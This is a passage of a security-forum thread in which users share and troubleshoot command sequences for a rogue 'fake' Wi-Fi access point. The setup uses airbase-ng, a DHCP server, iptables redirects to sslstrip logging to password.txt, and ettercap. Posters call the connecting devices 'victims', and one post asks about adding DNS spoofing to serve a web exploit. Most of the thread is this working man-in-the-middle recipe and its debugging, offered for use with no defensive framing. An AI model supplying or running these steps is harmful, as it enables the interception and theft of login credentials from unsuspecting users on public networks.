    2013-Nov
    Posts
    68
    Quote Originally Posted by zimmaro View Post
    nothing.. solve ..delete old logs & now the server start!!!
    ...but i don't connect to fake_AP....
    , but that was your code.

  35. #35
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by thepoor View Post
    , but that was your code.
    1)with """MY""" dhcpd.conf && with """MY""" procedure WORKED PERFECT!!! in my """lan-house-country-provider"
    2)with the last posted i tryed but not connect to fakeAP

    PS: the-code is not MY i'only SHARED my positive-test in my lan after 12345600000000 of proofsss

    http://imageshack.us/f/20/8wmd.png/
    Last edited by zimmaro; 2013-12-29 at 11:05.

  36. #36
    Join Date
    2014-Feb
    Location
    Italy
    Posts
    3
    Hello everyone, I Zimmaro method works, but I wanted to know if you can do a dns spoofing with ettercap so you can try a webexploit ... Thanks

  37. #37
    Join Date
    2014-Apr
    Location
    +54
    Posts
    1
    Hi there. i think my case requires some expertise i don't possess about route/iptables. Let me explain: in my notebook, i have an usb RT3070 wifi card, and the onboard Broadcom wifi card. My intention is to:
    1. connect the Broadcom wifi [wlan0] to any hotspot,
    2. use the usb Ralink wifi [wlan1] to create a RAP, --> [at0]
    3. start a DHCP daemon listening on [at0] to lease addresses,
    4. route the traffic from [at0] to [wlan0] to allow normal navigation
    5. attach ettercap + sslstrip to at0.

    so far, following zimmaro's approach, i've managed to create the RAP, start the DHCP listening on at0, and ettercap/sslstrip don't complain about anything. however, there's no routing between the test client (android device) and [wlan0], which in practice means that i cannot navigate from the cellphone, and therefore i can't get any data on ettercap/sslstrip.

    THINGS I'VE TRIED:

    * every little variation posted in this thread about route and iptables. obviously replacing the internet-facing device with [wlan0], to reflect that i'm not using [eth0] but the connected onboard wifi card.

    * DNS are set in dhcpd.conf as 8.8.8.8

    i am 80% sure this is about iptables and route. either i'm allowing traffic through a static route that is not created/not working as intended, or i'm denying traffic thru a route well/wrongly created.

    i'm gonna stay online waiting & replying. Thanks very much in advance.

  38. #38
    Join Date
    2014-May
    Posts
    18
    this work with me try it

    #Open Term1
    airmon-ng start wlan1
    airbase-ng -e "DumDum" -c 11 -v mon0

    #Open Term2
    #Install a DHCP for your access point
    nano /etc/dhcp3/dhcpd.conf

    default-lease-time 700;
    max-lease-time 8000;
    authoritative;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.254;
    option domain-name-servers 8.8.8.8;
    range 10.0.0.1 10.0.0.140;
    }


    #start your new WifiRouter.
    ifconfig at0 up
    ifconfig at0 10.0.0.254 netmask 255.255.255.0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

    #Start your WifiRouters DHCP
    echo > '/var/lib/dhcp/dhcpd.leases'
    ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
    dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0

    #open Term3
    #clear any old iptables and nats you might have

    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

    #change directory in to ssl stripper to make life easyer
    cd /usr/share/sslstrip/
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 4444
    echo "1" > /proc/sys/net/ipv4/ip_forward

    #Start SSL Stripper
    ./sslstrip.py -l 4444 -w password.txt

  39. #39
    Join Date
    2014-May
    Posts
    1
    Hi,
    I also want to make a fake access point and got the following problem when I'm going to act on the instructions above:

    ############################################
    root@kali:~# airmon-ng start wlan1 11


    Found 4 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    2355 NetworkManager
    2515 wpa_supplicant
    2541 dhclient
    3149 dhclient
    Process with PID 2541 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    mon0 Atheros ath5k - [phy0]
    wlan0 Atheros ath5k - [phy0]

    root@kali:~# airbase-ng -c 11 -e HOME mon0
    15:28:41 Created tap interface at0
    15:28:41 Trying to set MTU on at0 to 1500
    15:28:41 Access Point with BSSID 00:16:44:861:42 started.
    Error: Got channel -1, expected a value > 0.
    ############################################

    ...and the dhcpd configurations look like that:

    ######################################
    authoritative;

    default-lease-time 700;
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "HOME";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.30 10.0.0.60;

    }
    ##############################################

    Anybody any ideas?

    (I'm a total noob..need some clarification please...)
    Last edited by Noob_4_Life; 2014-06-01 at 12:02.

  40. #40
    Join Date
    2014-Jun
    Posts
    1
    Noob_4_Life...first you need to learn HOW TO FIX Airodump-ng fixed channel -1 ...

  41. #41
    Join Date
    2014-Jun
    Location
    Greece
    Posts
    133
    Quote Originally Posted by Noob_4_Life View Post
    Hi,
    I also want to make a fake access point and got the following problem when I'm going to act on the instructions above:

    ############################################
    root@kali:~# airmon-ng start wlan1 11


    Found 4 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    2355 NetworkManager
    2515 wpa_supplicant
    2541 dhclient
    3149 dhclient
    Process with PID 2541 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    mon0 Atheros ath5k - [phy0]
    wlan0 Atheros ath5k - [phy0]

    root@kali:~# airbase-ng -c 11 -e HOME mon0
    15:28:41 Created tap interface at0
    15:28:41 Trying to set MTU on at0 to 1500
    15:28:41 Access Point with BSSID 00:16:44:861:42 started.
    Error: Got channel -1, expected a value > 0.
    ############################################

    ...and the dhcpd configurations look like that:

    ######################################
    authoritative;

    default-lease-time 700;
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "HOME";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.30 10.0.0.60;

    }
    ##############################################

    Anybody any ideas?

    (I'm a total noob..need some clarification please...)
    As I can see you use a ath5k based wifi card. Since airebase-ng's based faked AP are extremely slow, you can try to create a master mode based fake AP. To do so, you must install the discontinued madwifi-ng drivers, but they are a little buggy and you can harm your KALI installation. If you' re willing to do it, you can try this:
    Code:
    apt-get update
    git clone https://github.com/proski/madwifi madwifi-ng
    apt-get install -y linux-headers-"`uname -r`" 
    apt-get install build-essential libssl-dev
    # Let's patch it for injection
    wget http://patches.aircrack-ng.org/madwifi-ng-r4073.patch
    patch -N -p 0 -i madwifi-ng-r4073.patch
    # Let's "unload" our current driver
    modprobe -r ath5k
    modprobe -r ath
    echo "blacklist ath9k" >> /etc/modprobe.d/kali-blacklist.conf
    echo "blacklist ath5k" >> /etc/modprobe.d/kali-blacklist.conf
    echo "blacklist ath" >> /etc/modprobe.d/kali-blacklist.conf
    modprobe ath_pci autocreate=none
    wlanconfig ath0 create wlandev wifi0 wlanmode ap
    and you got a master mode based fake AP! After that you can change your essid, channel etc by:
    Code:
    iwconfig ath0 essid youressid
    iwconfig ath0 channel yourchannel
    Finally I must note that if you want to go back to ath5k you must unload the ath_pci driver, unblacklist the ath5k,ath9k and ath modules from kali-blacklist.conf and load the ath5k driver again.

  42. #42
    Join Date
    2014-Aug
    Posts
    1
    Hi everyone, first thing sorry for my bad english but it isn't my first language.
    I followed a lot of guide, but I can't realize this fake AP. I followed also the guide of Zimmaro, but without results. I can create the AP and I can connect with the AP (from Windows I get also the message connected to Internet), but when I try to navigate I can't. It seems I can ping a address like 8.8.8.8 (not always in some test it doesn't work) but if I try to ping www.google.com I can't (just in some test it worked). From another client I can't ping anything (just in some test it worked). It seems like if the connection is really slow or instable (I see also the skype icon, in the client connected to the fake AP) that for a few moment is connected but after some seconds it write again "In connection...". Please, somene could give me a help? These are the istructions I use:

    my GW is: 192.168.1.254

    Code:
    airmon-ng start wlan0 11
    airbase-ng -c 11 -e WIFI_TEST444555 mon0
    ifconfig at0 192.168.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD  --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    Code:
    sslstrip -f -p -k 10000
    Code:
    ettercap -p -u -T -q -i at0
    dhcpd.conf
    Code:
    authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 192.168.0.0 netmask 255.255.255.0 {
    option routers 192.168.0.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "FREE_WIFI444555";
    option domain-name-servers 192.168.0.1;
    
    
    range 192.168.0.30 192.168.0.60;
    
    }

  43. #43
    Join Date
    2014-Oct
    Posts
    1
    when im doing like a zimmaro after command
    airbase-ng -c 11 -e wifi mon0
    it says "Error: Got channel -1, expected value > 0"
    end even if i choose another chanel its still says the same
    sorry for my english

  44. #44
    Join Date
    2014-Jun
    Location
    Greece
    Posts
    133
    Quote Originally Posted by chestor View Post
    when im doing like a zimmaro after command
    airbase-ng -c 11 -e wifi mon0
    it says "Error: Got channel -1, expected value > 0"
    end even if i choose another chanel its still says the same
    sorry for my english
    Hi there chestor !
    You can try my script
    Aerial - How to E-Z Setup a Multi-mode wireless LAN Based on a Software Access point
    and select mode 6:
    6. MiTM - Transparent SSLstriped WLAN (Sslstrip).
    you will be able to setup a transparent sslstriped wireless LAN very easely with airbase-ng or hostapd.
    It's almost the same as zimmaro's approach.
    Security always begins with personal responsibility. - quietman7

  45. #45
    Join Date
    2014-Oct
    Location
    Location
    Posts
    7
    Hello, I try to set up a fake wifi 2.4Ghz AP, I use the Alfa AWUS036H adapter that is connected to a wifi network ESSID: freewifi. Can I create a fake access point with the same ESSID?(Freewifi) and distribute it to as internet (and that would be my wifi the adapter is connected to this AP, and not reconnected to the I created AP)? can i take a WIFI interface and immediately distribute the Internet? Below I will give you as I try to implement it.

    Gateway in the network from which I take the internet : 192.168.2.1
    Operating System: kali-linux 1.0.9a-i386

    1.Tell me the logic of my example correct?

    2.On the Internet I could not find examples of creating a fake AP where to connect to the Internet and to create a fake AP would be used one WiFi interface.

    3.Why my card is not connected to a WiFi network and does not receive the settings via dhсp? (Tried and integrated adapter, but the result is the same) write that the Problem may be in the driver... but why can not I connect by the built-in adapter I do not understand...


    iw reg set BO
    iwconfig wlan1 txpower 30
    iwconfig wlan1 essid "freewifi" ap 01:00:00:00:00:00 #connection to AP by ESSID and BSSID
    dhclient -v wlan1
    apt-get install isc-dhcp-server
    nano /etc/dhcpd.conf
    ######
    authoritative;

    default-lease-time 700;
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "HOME";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.30 10.0.0.60;

    }
    ######
    airmon-ng start wlan1 11
    airbase-ng mon0 -c 7 --essid "freewifi" #creation of FAKE AP with the same ESSID
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.2.1
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    ###### ####
    root@hk3r:~# sslstrip -f -p -k 8080
    ######
    root@hk3r:~# ettercap -p -u -T -q -i at0
    ######
    Additional Information:
    root@kali:~# iptables -L -n
    Chain INPUT (policy ACCEPT)
    target prot opt source destination

    Chain FORWARD (policy ACCEPT)
    target prot opt source destination

    Chain OUTPUT (policy ACCEPT)
    target prot opt source destination

    root@kali:~# dhclient -v wlan1
    Internet Systems Consortium DHCP Client 4.2.2
    Copyright 2004-2011 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    Listening on LPF/wlan1/MYADAPTERMAC
    Sending on LPF/wlan1/MYADAPTERMAC
    Sending on Socket/fallback
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 6
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 11
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 14
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 15
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 8
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 7
    No DHCPOFFERS received.
    No working leases in persistent database - sleeping.

    root@kali:~# tcpdump -i wlan1 port 67 or port 68 -e -n
    clear....
    I will be very glad to help.

  46. #46
    Join Date
    2014-Nov
    Posts
    3
    Hi, I've some trouble with dns.
    my configuration is:

    wlan0 is default network for access to lan and internet
    wlan1 is the Alfa wireless network for fakeAP

    the ifconfig results is:
    eth0 Link encap:Ethernet HWaddr 00:1c:25:95:70:18
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
    Interrupt:20 Memory:fc600000-fc620000

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:65536 Metric:1
    RX packets:50 errors:0 dropped:0 overruns:0 frame:0
    TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:19773 (19.3 KiB) TX bytes:19773 (19.3 KiB)

    wlan0 Link encap:Ethernet HWaddr 00:16:ea:b1:5d:12
    inet addr:172.16.1.157 Bcast:172.16.255.255 Mask:255.255.0.0
    inet6 addr: fe80::216:eaff:feb1:5d12/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:297 errors:0 dropped:0 overruns:0 frame:0
    TX packets:23 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:22659 (22.1 KiB) TX bytes:2453 (2.3 KiB)

    wlan1 Link encap:Ethernet HWaddr 00:c0:ca:62:04:a9
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    then route -n is:

    Kernel IP routing table
    Destination Gateway Genmask Flags Metric Ref Use Iface
    0.0.0.0 172.16.1.254 0.0.0.0 UG 0 0 0 wlan0
    172.16.0.0 0.0.0.0 255.255.0.0 U 0 0 0 wlan0


    now my command is:

    apt-get install dhcp3-server
    gedit /etc/dhcpd.conf


    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 172.16.77.0 netmask 255.255.255.0 {
    option routers 172.16.77.254;
    option subnet-mask 255.255.255.0;
    option domain-name "wifiFREE";
    option domain-name-servers 172.16.77.254;
    range 172.16.77.2 172.16.77.20;
    }


    airmon-ng
    airmon-ng start wlan1
    airbase-ng -c 11 -e wifiFREE mon0


    ifconfig at0 172.16.77.254 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 172.16.77.0 netmask 255.255.255.0 gw 172.16.77.254
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 172.16.1.254
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start

    sslstrip -l 8080

    ettercap -p -u -T -q -i at0

    then i take my ipad and connect to wifiFREE without any trouble.
    ip address are assigned correctly and if from ipad with fing i ping 8.8.8.8 it respond correctly.
    but if from ipad safari I try to open google.com or any other website after some seconds when the browser tries unsuccessfully to load the page i can't display websites.
    if i try with ip address insted i can view websites.
    this is strange because even setting

    option domain-name-servers 172.16.77.254, 8.8.8.8;

    i have the same situation.

    anyone have an idea about solve this strange trouble?
    TIA
    Last edited by myn; 2014-11-22 at 10:55.

  47. #47
    Join Date
    2014-Nov
    Posts
    3
    is it possible due to my network firewall Cisco ASA? It's strange beacause in my granparents network it works finely
    Last edited by myn; 2014-11-22 at 10:57.

  48. #48
    Join Date
    2015-Feb
    Posts
    1
    hi, i have done every step like you do, buy in the "victim" machine, when i connect to the fake access point it sais that there is no internet acces. I dont know what to do to change that could anyone help me.

  49. #49
    Join Date
    2014-Feb
    Posts
    1
    Hello, Zimmaro

    I follow yours steps and I can connect to the fake wifi and get IP via DHCP, but can't navigate to the internet it's appear be a problem with DNS, because the browser was trying and trying...

    I do the test with 2 wlan's. wlan0=interface connected on the internet, wlan1=fake (USB)

    When I create the fake SSID # airbase-ng -c 11 -e HOME mon0 I get the this output:

    16:35:05 Created tap interface at0
    16:35:05 Trying to set MTU on at0 to 1500
    16:35:05 Trying to set MTU on mon0 to 1800
    16:35:05 Access Point with BSSID 38:B1B:CD:26:35 started.
    Error: Got channel -1, expected a value > 0.



    Can you help me?

    Thank you!

  50. #50
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Manolo View Post
    Hello, Zimmaro

    I follow yours steps and I can connect to the fake wifi and get IP via DHCP, but can't navigate to the internet it's appear be a problem with DNS, because the browser was trying and trying...

    I do the test with 2 wlan's. wlan0=interface connected on the internet, wlan1=fake (USB)

    When I create the fake SSID # airbase-ng -c 11 -e HOME mon0 I get the this output:

    16:35:05 Created tap interface at0
    16:35:05 Trying to set MTU on at0 to 1500
    16:35:05 Trying to set MTU on mon0 to 1800
    16:35:05 Access Point with BSSID 38:B1B:CD:26:35 started.
    Error: Got channel -1, expected a value > 0.



    Can you help me?

    Thank you!
    hi :-)
    -for error -1 try to use airmon-zc to put in monitor-mode ""fake-usb-device""
    http://postimg.org/image/4e8na9zq7/
    -for correct fake_AP ..my procedure is TO OLD (for old kali-version && old victims-browser/update_system) now i'don't have time to RE-TEST it on new kali 1.1.0a ..USE PLUS-GREAT script Aerial.sh by Nick_The_Greek (worked fine && have many options)
    bye
    Last edited by zimmaro; 2015-04-23 at 08:53.

Similar Threads

  1. fake access point clients can not access internet
    By --JayJay-- in forum General Archive
    Replies: 1
    Last Post: 2016-03-25, 14:02

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •